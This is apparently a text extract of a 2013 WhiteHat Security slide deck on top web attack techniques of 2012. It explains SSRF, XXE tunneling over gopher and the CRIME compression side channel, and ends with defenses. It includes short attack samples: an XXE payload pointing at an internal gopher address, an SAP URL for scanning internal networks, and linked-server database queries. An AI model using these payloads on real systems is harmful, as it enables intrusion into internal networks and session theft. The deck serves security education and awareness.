  • 61. H ISTO RY SSRF (CIRCA 2008) “The first example of SSRF is an SMBRelay attack discussed by Deral Heiland at Shmoocon in 2008 entitled, “Web Portals Gateway To Information Or A Hole In Our Perimeter Defenses.” Some web-interfaces on corporate portals allow loading any external resource like an iframe. The difference was that Web interface allows loading files from other HTTP sources. It was done by portlets that were designed to deliver to the user the requested information that the user cannot access directly. The portlet runs a transaction to a connected system and then runs its response with information to the portal user. These portlets makes portal a single point of access to internal resources. This was a great example of SSRF attack via URL parameter of vulnerable portlet.” … “Later, other examples of SSRF attacks were shown. Same ideas, but attack was executed through XML External Entity vulnerability. “ © 2013 WhiteHat Security, Inc. 61
  • 62. BASIC S Attack Flow • Send Packet A to Service A • Service A initiates Packet B to Service B • Services can be on the same host or on different hosts • We can manipulate some fields of Packet B within Packet A • Various SSRF attacks depend on how many fields we can control in Packet B Exploitation • Vulnerabilities like File Include, SQL Injection, XML External Entity or any other vulnerability that allows executing commands that initiate calls to remote systems. • Through enhanced rights in an application, when you can call HTTP pages or UNC paths or use trusted connections. © 2013 WhiteHat Security, Inc. 62
  • 63. C L ASSIF IC AT ION Many classes of SSRF attacks (complicated) • Trusted SSRF: Send requests (Packet B) to remote services, but only to those which are somehow predefined. • Remote SSRF: Requests (Packet B) to any remote IP and port. This type has 3 subtypes depending on how much data we can control: • Simple Remote SSRF: No control on application level of Packet B • Partial Remote SSRF: Control on some fields of application level of Packet B • Full Remote SSRF: Full control on application level of Packet B © 2013 WhiteHat Security, Inc. 63
  • 64. EXAMPL ES Trusted SSRF attacks MSSQL: Need at least public rights to use MSSQL trusted links. Links can be with predefined passwords. The attacker can use them in Host A to forge requests and obtain responses from Host B. Select * from openquery(HostB,'select * from @@version')] Oracle: Links can be with predefined passwords. The attacker can use them to forge requests and obtain responses from host B. SELECT * FROM myTable@HostB EXECUTE mySchema.myPackage.myProcedure('someParameter')@HostB © 2013 WhiteHat Security, Inc. 64
  • 65. EXAMPL ES Simple Remote SSRF SAP NetWeaver ipcpricing: Scan an internal network from the Internet by sending different HTTP requests to JSP pages. /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&dispatcher=&targetCli ent= © 2013 WhiteHat Security, Inc. 65
  • 66. XXE T U N N EL IN G Partial Remote SSRF XXE Tunneling (via Gopher): XML External Entity (XXE) is a very popular vulnerability in XML Parser. External entities force the XML parser to access the resource specified by the URI, e.g., a file on the local machine or on a remote systems. • Makes a TCP connection with 172.16.0.1 and port 3300 and then send a packet containing string 23456789 (the first symbol will be cut). <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM ―gopher://172.16.0.1:3300/AAAAAAAAA" >]> <foo>&date;</foo> © 2013 WhiteHat Security, Inc. 66
  • 67. D IAG R AM © 2013 WhiteHat Security, Inc. 67
  • 68. AD VAN C ED XXE Tunneling to Buffer Overflow • A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in sapnote 1487330) • Shellcode size is limited to 255 bytes (name parameter) • As we don‘t have direct connection to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back © 2013 WhiteHat Security, Inc. 68
  • 69. PAC KET B © 2013 WhiteHat Security, Inc. 69
  • 70. PAC KET A Insert Packet B into Packet A • We need to insert non-printable symbols. Gopher supports urlencode like HTTP • Also help evade attack against IDS systems © 2013 WhiteHat Security, Inc. 70
  • 71. FULL CONTROL © 2013 WhiteHat Security, Inc. 71
  • 72. C O U N T ER -AT TAC K SSRF back connect attack We send a command from Server A to our Server C using SSRF, and then we generate a response which will trigger a vulnerability in an application from Server A. SMB client • DoS by reading huge files remotely • SMBRelay • RCE Vulnerabilities in SMB client Memory corruption vulnerabilities in FTP client Client path traversal JAR parser mailto: parser HTTP client • DoS by multiple entities with links to big data • DoS by multiple GZIP bomb © 2013 WhiteHat Security, Inc. 72
  • 73. 2 0 1 2 TO P T EN CRIME ―Compression Ratio Info-leak Made Easy (CRIME) is a security exploit against secret web cookies over connections using the HTTPS and SPDY protocols that also use data compression. When used to recover the content of secret authentication cookies, it allows an attacker to perform session hijacking.‖ Juliano Rizzo and Thai Duong http://netifera.com/research/crime/CRIME_ekoparty2012.pdf http://en.wikipedia.org/wiki/CRIME_(security_exploit) http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/ © 2013 WhiteHat Security, Inc. 73
  • 74. BASIC S CRIME Decrypts HTTPS traffic to steal cookies and hijack sessions. Requirements to become a victim: 1) Attacker can sniff your network traffic. 2) Victim visits evil.com 3) Both the browser and server support any version of TLS compression or SPDY Previously * Vulnerable Never Vulnerable Gmail, Twitter, Dropbox, GitHub, etc. “42% of sites surveyed by his service support TLS compression.” Ivan Ristic https://www.ssllabs.com/index.html © 2013 WhiteHat Security, Inc. 74
  • 75. SID E - C H AN NEL CRIME: Chosen Plaintext Attack • Compression reduces the number of bytes contained in a data stream by removing redundant bits. A side effect of compression is it leaks clues about the encrypted contents, providing a "side channel" to those with the ability to monitor the data. • By modifying the clear-text payload hundreds or thousands of times and watching how each one interacts with the encrypted data, attackers can deduce its contents. • An encrypted message is combined with attacker-controlled JavaScript that, letter by letter, performs a brute-force attack on the secret key. When it guesses the letter X as the first character of the cookie secret, the encrypted message will appear differently than an encrypted message that uses W or Y. • Once the first character is correctly guessed, the attack repeats the process again on the next character in the key until the remainder of the secret is deduced. The use of JavaScript isn't necessary, but does make the brute-force attack faster. http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/ © 2013 WhiteHat Security, Inc. 75
  • 76. AT TAC K F L O W "Basically, the attacker is running script in Evil.com. He forces the browser to open requests to Bank.com by, for example, adding <img> tags with src pointing to Bank.com," Rizzo said. "Each of those requests contains data from mixed sources.” In these requests, attacker data and data produced by the browser is compressed and mixed together. Those requests can include the path, which the attacker controls, the browser's headers, which are public, and the cookie, which should be secret. "The problem is that compression combines all those sources together," Rizzo added. "The attacker can sniff the packets and get the size of the requests that are sent. By changing the path, he could attempt to minimize the request size, i.e., when the file name matches the cookie." http://threatpost.com/en_us/blogs/crime-attack-uses-compression-ratio-tls-requests-side-channel-hijack-secure-sessions-091312 © 2013 WhiteHat Security, Inc. 76
  • 77. D EMO Video demo shows Github.com, Dropbox.com, and Stripe.com, when visited with a then-patched version of Chrome, succumbing to the CRIME attack. All three of disabled compression and no longer vulnerable. https://www.youtube.com/watch?v=gGPhHYyg9r4 © 2013 WhiteHat Security, Inc. 77
  • 78. D EF EN SE Browser Upgrade browsers to the latest version. Server Disable compression. © 2013 WhiteHat Security, Inc. 78
  • 79. WHAT WE’VE LEARNED © 2013 WhiteHat Security, Inc. 79
  • 80. L ESSO N S • What’s old is new and improved: Many Web attack techniques from previous years, including those not appearing on the Top Ten, are constantly being improved. Researchers leverage new technology functionality and combine previously known techniques and produce combinations. • 3-Peat: Encryption related attack techniques, by Juliano Rizzo and Thai Duong, took the #1 spot 3 years in a row (BEAST in 2011 and Padding Oracle in 2010). Web security community respects deep technical research. • Attack and Researcher Diversity: In 2012 we saw attack techniques focused on encryption, HTML5 / client-side, mobile, infrastructure server-side, intranet, session state, etc. The range of expertise to keep up with all the new cutting-edge research is at the very least, a full-time job. And the researchers themselves are located across the globe. © 2013 WhiteHat Security, Inc. 80
  • 81. Thank you to… • All Web security researchers • Panel of Judges: Ryan Barnett, Robert Auger, Robert Hansen (CEO, Falling Rock Networks) Dinis Cruz, Jeff Williams (CEO, Aspect Security), Peleus Uhley, Romain Gaucher (Lead Researcher, Coverity), Giorgio Maone, Chris Wysopal, Troy Hunt, Ivan Ristic (Director of Engineering, Qualys), and Steve Christey (MITRE) • Everyone in the Web security community who assisted with voting JEREMIAH GROSSMAN MATT JOHANSEN Founder and CTO Head of the Threat Research Center Twitter: @jeremiahg Twitter: @mattjay Email: jeremiah@whitehatsec.com Email: matt@whitehatsec.com

Editor's Notes

  1. According to the provided scenario, the exploit will not work if the victim has already accessed the login.php page. This is not always the case. For example, many web applications have a logout page whose job is to clear session data and to issue either new session cookie or empty session session cookie such as PHPSESSID=deleted. Here, our XSS payload will call this logout page first and then call the login page which issues HttpOnly session cookie.
  2. \\
  3. Yay HTML5!